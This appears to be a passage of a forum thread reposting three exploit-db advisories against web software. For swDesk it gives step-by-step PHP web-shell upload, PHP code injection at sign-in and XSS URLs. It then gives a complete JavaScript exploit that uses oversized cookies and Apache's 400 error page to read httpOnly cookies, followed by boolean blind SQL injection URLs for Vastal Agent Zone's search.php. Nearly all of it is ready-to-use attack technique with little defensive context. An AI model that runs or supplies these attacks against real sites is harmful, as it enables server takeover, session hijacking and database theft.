    # Title : swDesk Multi Vulnerability
    # Author : Red Security TEAM
    # Date : 01/02/2012
    # Risk : High
    # Vendor : http://www.swdesk.com/
    # Tested On : Apache
    # Contact : Info [ 4t ] RedSecurity [ d0t ] COM
    # Home : http://RedSecurity.COM
    #
    # Exploit :
    #
    # I. Arbitrary File Upload Vulnerability
    # 1. Go to http://server/create_ticket.php
    # 2. Fill in all input fields and click "Submit Ticket"
    # 3. Click on the View Ticket and you should go to the link Like : http://server/view_ticket.php?email=[Your Email]&id=1
    # 4. You see Send Message box , Write any thing there and attach your PHP file in the Upload attachment and Click on Send Message
    # 5. The attachment is then listed above the message (e.g. "Attachment: shell.php"). Clicking it opens the upload directly, and because it is served with its original .php name the server executes your PHP code - i.e. the upload is neither type-checked nor stored outside the web root.
    #
    # II. PHP Code Injection Vulnerability
    # 1. Go to http://server/signin.php - vulnerable input fields: email, password
    # 2. Submit PHP in either field, e.g.: phpi${@print(RedSecurityTEAM)} (the ${...} form suggests the value ends up inside an evaluated double-quoted PHP string; the advisory does not show the sink)
    #
    # III. XSS Vulnerability
    # 1. http://server/view_ticket.php?email=example@example.com&id=" onmouseover=alert(1) bad="
    # 2. http://server/kb_search.php?keywords=" onmouseover=alert(1) bad="&mode=Search
    #
    # Thanks To : http://1337day.com/ , http://www.exploit-db.com/ , http://securityreason.com/ , http://packetstormsecurity.org/
    #

    Sursa: http://www.exploit-db.com/exploits/18443/

  16. Apache httpOnly Cookie Disclosure

    // Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
    // Most browsers limit cookies to 4k characters, so we need multiple
    // Sets (or, when `good` is truthy, expires) ten padding cookies xss0..xss9,
    // each 819 bytes long. Browsers cap a single cookie at roughly 4 KB, so the
    // padding is spread over several cookies; together they make the Cookie
    // header large enough that the server rejects the request with a 400 whose
    // error page echoes the header back (see makeRequest).
    function setCookies (good) {
      var filler = new Array(820).join("x"); // 819 x's
      var idx;
      for (idx = 0; idx < 10; idx++) {
        var name = "xss" + idx;
        if (good) {
          // Expire the padding cookie (date one millisecond in the past).
          document.cookie = name + "=;expires=" + new Date(+new Date() - 1).toUTCString() + "; path=/;";
        } else {
          document.cookie = name + "=" + filler + ";path=/";
        }
      }
    }
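    // Issues a GET / with the oversized Cookie header and, on a 400 response,
    // scrapes the echoed "Cookie:" line out of the error page's <pre> block into
    // a name -> value object (httpOnly cookies included, which is the point).
    //
    // Fixes vs. the original: match() returning null no longer throws; the
    // padding cookies are removed whenever the request finishes, not only on
    // 400; cookie names are trimmed and values containing "=" are kept whole
    // (split('=', 2) used to drop everything after the second "=").
    function makeRequest() {
      setCookies();
      var xhr = new XMLHttpRequest();
      xhr.onreadystatechange = function () {
        if (xhr.readyState !== 4) {
          return;
        }
        // Clean up first so a non-vulnerable server does not leave the browser
        // carrying ~8 KB of junk cookies for this origin.
        setCookies(true);
        if (xhr.status !== 400) {
          return;
        }
        var cookie_dict = {};
        var found = xhr.responseText.replace(/\r|\n/g, '').match(/<pre>(.+)<\/pre>/);
        if (found) {
          var content = found[1].replace("Cookie: ", "");
          var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
          for (var i = 0; i < cookies.length; i++) {
            var raw = cookies[i];
            var eq = raw.indexOf('=');
            var name = (eq < 0 ? raw : raw.slice(0, eq)).trim();
            if (!name) {
              continue; // empty fragment, e.g. after a trailing ";"
            }
            cookie_dict[name] = eq < 0 ? undefined : raw.slice(eq + 1);
          }
        }
        alert(JSON.stringify(cookie_dict));
      };
      xhr.open("GET", "/", true);
      xhr.send(null);
    }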
    // Entry point: runs as soon as the script loads. It must execute in the
    // origin served by the vulnerable Apache instance, since the XHR targets "/".
    makeRequest();

    Sursa: Apache httpOnly Cookie Disclosure

  17. Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability

    Agent Zone Vastal I-Tech Blind SQL Injection Vulnerability
    # Date: 31.01.2012
    # Author: Cagri Tepebasili
    # Software : http://www.vastal.com/agent-zone-real-estate-script.html
    # Tested on: Linux Mint 12
    #####################################################################################################################
    The First Step >>> (append a true condition; the page should respond exactly as for the plain query)
    http://server/real/search.php?price_from=1000000.00+and+1=1&price_to=10000000.00
    The Second Step >>> (append a false condition; a different response shows price_from reaches the SQL unescaped, in a numeric/unquoted context - boolean-based blind injection)
    http://server/real/search.php?price_from=1000000.00+and+1=0&price_to=10000000.00
    Injection >>> (replace [BlindSQLI] with the true/false condition to test)
    http://server/real/search.php?price_from=1000000.00[BlindSQLI]&price_to=10000000.00
    Greetz : MythSEC <<<

    Sursa: Vastal I-Tech Agent Zone (search.php) Blind SQL Injection Vulnerability
